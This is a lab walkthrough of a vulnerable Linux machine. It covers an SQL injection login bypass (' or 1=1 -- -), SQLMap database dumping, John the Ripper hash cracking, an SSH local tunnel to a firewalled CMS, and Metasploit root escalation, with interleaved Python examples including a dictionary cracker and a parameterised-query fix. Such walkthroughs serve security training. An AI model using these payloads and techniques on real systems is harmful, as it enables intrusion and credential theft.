Walkthrough of a Linux machine: bypassing a login form with SQL injection, dumping and cracking credentials from the database, tunnelling to a firewalled internal service and gaining root with a Metasploit payload.
Deploying the vulnerable machine
What is the name of the large cartoon avatar holding a sniper on the forum?
Obtain access via SQLi
The Nmap scan shows two services, SSH and HTTP, and not much else.
The login form sits on top of an SQL database. Whatever we type is pasted straight into the backend query, which looks like SELECT * FROM users WHERE username = :username AND password = :password, with :username and :password replaced by our input. Putting ' or 1=1 -- - into the username field closes the string early, adds a condition that is always true and comments out the rest of the query, password check included (the trailing - after -- keeps the space MySQL requires after the comment marker from being trimmed away). The query therefore returns every row of the users table, and the application treats the first row as a successful login.
This bypasses the login page.
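To see the bypass concretely, here is an added example (not code from the original walkthrough or from the lab's application) that builds the login query both ways against an in-memory SQLite table of constructed users: the string-concatenated version the page describes, and a parameterised version in which the same payload is treated as plain data. The user names and passwords are made up for the example.

```python
import sqlite3

# Constructed stand-in for the site's users table; not the lab's data.
SAMPLE_USERS = [
    ("agent", "first-pw"),
    ("admin", "s3cret"),
]


def make_db():
    """In-memory SQLite database with a users(username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Builds the query the way the page describes: user input concatenated into SQL.

    With username = "' or 1=1 -- -" the query becomes
      SELECT username FROM users WHERE username = '' or 1=1 -- -' AND password = '...'
    so the WHERE clause is always true and the password check is commented out.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def safe_login(conn, username, password):
    """Same query with bound parameters: the payload can only ever match a literal username."""
    query = "SELECT username FROM users WHERE username = :username AND password = :password"
    return [row[0] for row in conn.execute(query, {"username": username, "password": password})]


def demo():
    """Run the injection payload through both versions and a legitimate login through the safe one."""
    conn = make_db()
    payload = "' or 1=1 -- -"
    return {
        "vulnerable": vulnerable_login(conn, payload, "anything"),  # every user comes back
        "safe": safe_login(conn, payload, "anything"),              # nothing matches
        "legit": safe_login(conn, "admin", "s3cret"),               # normal login still works
    }


if __name__ == "__main__":
    print(demo())
```

The application logs the attacker in because it takes the first row the query returns; the parameterised query returns no rows for the payload, which is the whole fix.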
What page do we get redirected to?
Using SQLMap
First we intercept a request to the site's search feature with Burp Suite.
Saving the complete POST request, headers (including the session cookie) and body, to a text file lets us hand it to SQLMap as a request file, so SQLMap reuses our authenticated session instead of being bounced back to the login page.
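The saved request only does its job if it really is the complete, authenticated request. The following added example (not from the original post and not part of SQLMap) parses a constructed Burp-style request file, checks for the things that commonly go wrong before the file is passed on, and assembles the SQLMap invocation. The path /search, the parameter q, the host and the cookie value are placeholders, not the lab's real values.

```python
from urllib.parse import parse_qs

# Constructed Burp-style POST request as saved to a text file. Path, parameter,
# host and cookie are placeholders for this example, not the lab's real values.
SAMPLE_REQUEST = """POST /search HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=0123456789abcdef
Content-Length: 6

q=test
"""


def parse_raw_request(text):
    """Split a raw HTTP request into method, path, headers (lower-cased names) and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body.strip()}


def sqlmap_readiness(req):
    """Problems that would make SQLMap test the wrong thing. An empty list means go."""
    problems = []
    if req["method"] != "POST":
        problems.append("not a POST: the captured search request is submitted by POST")
    if "cookie" not in req["headers"]:
        problems.append("no Cookie header: SQLMap would be bounced to the login page")
    if not parse_qs(req["body"]):
        problems.append("empty body: no form parameter for SQLMap to inject into")
    return problems


def sqlmap_command(request_file, dbms=None):
    """Argument vector for SQLMap. -r, --batch and --dump are real SQLMap options;
    --dbms is optional and narrows the tests when the backend is known (assumed here,
    the page does not name the database engine)."""
    cmd = ["sqlmap", "-r", request_file, "--batch", "--dump"]
    if dbms:
        cmd.append(f"--dbms={dbms}")
    return cmd
```

Run the readiness check on the file Burp wrote before invoking SQLMap; a missing Cookie header is the usual reason SQLMap reports the parameter as not injectable when it plainly is.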
In the users table, what is the hashed password?
What was the username associated with the hashed password?
What was the other table name?
Cracking a password with JohnTheRipper
What is the de-hashed password?
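Added example, not the post's own code and not John the Ripper itself: the dictionary attack John performs, written out in Python for an unsalted hex hash. The hash type is guessed from the digest length, the same hint John uses before asking for --format; the hash and the wordlist are constructed for the example, not the lab's.

```python
import hashlib

# Hex digest length -> unsalted algorithm. 32 hex chars could equally be MD4 or NTLM,
# which is why John often has to be told the raw-* format explicitly with --format.
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# Constructed stand-ins for a few wordlist lines and for the hash dumped from the
# users table; neither is the lab's real data.
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon"]
SAMPLE_HASH = hashlib.sha256(b"letmein").hexdigest()


def identify(hex_hash):
    """Candidate algorithms for a raw hex hash, guessed from its length."""
    h = hex_hash.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []  # salted or encoded formats ($1$..., $6$..., base64) need a real parser
    algo = DIGEST_LENGTHS.get(len(h))
    return [algo] if algo else []


def crack(hex_hash, wordlist, algorithms=None):
    """Dictionary attack: hash each candidate word with each algorithm until one matches.

    Returns (algorithm, plaintext), or None when the wordlist is exhausted. The
    wordlist is iterated once per algorithm, so give the right algorithm when known.
    """
    target = hex_hash.strip().lower()
    for algo in algorithms or identify(target):
        for word in wordlist:
            if hashlib.new(algo, word.encode()).hexdigest() == target:
                return algo, word
    return None


if __name__ == "__main__":
    print(crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The equivalent John run is john --wordlist=rockyou.txt --format=raw-sha256 hash.txt (substituting the format the digest length suggests); John does the same loop with far better throughput and rule-based mangling of each word.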
What is the user flag?
Exposing services with reverse SSH tunnels
First we do some internal enumeration, listing the sockets on the box with ss, which is essentially a replacement for netstat.
TCP port 10000 is listening, yet it never showed up in the initial Nmap scan, so a firewall rule must be blocking it from the outside. We can get around the block with port forwarding: a local SSH tunnel (ssh -L) binds a port on our machine and forwards anything sent to it over the SSH session to the port on the remote machine, where the connection originates locally and the firewall never sees it.
Running the same Nmap scan against 127.0.0.1 now detects the port and identifies the service.
This can also be confirmed in our web browser.
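An added example (not the walkthrough's own code) of the enumeration step: parse constructed ss -tulpn output, diff the listening TCP ports against the ports the external Nmap scan reported, and build the ssh -L argument for each hidden one. The addresses and ports in the sample output are made up for the example; the user name in the usage note is a placeholder.

```python
import re

# Constructed sample of `ss -tulpn` output on the compromised host (not the lab's output).
SAMPLE_SS = """Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0            0.0.0.0:68          0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:10000       0.0.0.0:*
tcp   LISTEN 0      80         127.0.0.1:3306        0.0.0.0:*
tcp   LISTEN 0      128             [::]:80             [::]:*
tcp   LISTEN 0      128             [::]:22             [::]:*
"""

# Ports the initial external Nmap scan reported open (constructed: SSH and HTTP only).
EXTERNAL_OPEN = {22, 80}

# "Local Address:Port" column; the address part may be 0.0.0.0, 127.0.0.1, [::] or *.
LOCAL_ADDR = re.compile(r"^(?P<addr>.*):(?P<port>\d+)$")


def listening_tcp_ports(ss_output):
    """Map each listening TCP port to its bind address."""
    listeners = {}
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5 or fields[0] != "tcp" or fields[1] != "LISTEN":
            continue
        m = LOCAL_ADDR.match(fields[4])
        if m:
            # Keep the first bind seen for a port (IPv4 before IPv6 in this sample).
            listeners.setdefault(int(m.group("port")), m.group("addr"))
    return listeners


def hidden_listeners(ss_output, external_open):
    """TCP ports listening on the box that the external scan did not report.

    A wildcard (0.0.0.0 / [::]) bind that Nmap missed points at a host firewall;
    a 127.0.0.1 bind was never reachable from outside at all. Either way a local
    SSH forward reaches it, because the forwarded connection originates on the host.
    """
    return {p: a for p, a in listening_tcp_ports(ss_output).items() if p not in external_open}


def local_forward_args(remote_port, local_port=None):
    """ssh -L argument: local_port on our machine -> remote_port on the SSH server itself."""
    local_port = local_port or remote_port
    return f"-L {local_port}:127.0.0.1:{remote_port}"


def tunnel_plan(ss_output, external_open):
    """One ssh -L argument per hidden listener, ready to append to an ssh command."""
    return [local_forward_args(p) for p in sorted(hidden_listeners(ss_output, external_open))]


if __name__ == "__main__":
    print(hidden_listeners(SAMPLE_SS, EXTERNAL_OPEN))
    print("ssh", " ".join(tunnel_plan(SAMPLE_SS, EXTERNAL_OPEN)), "user@victim")
```

With the sample data the plan is ssh -L 3306:127.0.0.1:3306 -L 10000:127.0.0.1:10000 user@victim; once that session is up, the Nmap scan and the browser both point at 127.0.0.1:10000. Note that the example also surfaces a loopback-only database port, which the page's walkthrough does not use but which the same tunnel would expose.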
What is the name of the exposed CMS?
What is the CMS version?
Privilege Escalation with Metasploit
Searching for exploits matching the CMS and its version turns up a couple of Metasploit modules.
Two things to keep in mind when exploiting through the tunnel: the SSH port forward has to stay alive for the whole Metasploit run, and, as a consequence, RHOSTS is our own machine (127.0.0.1, with RPORT set to the local end of the tunnel), not the victim's lab address. Only the exploit request travels through the tunnel; a reverse payload still has to reach LHOST on the attacking machine by itself.
Thanks for reading and as always, any feedback is most welcome.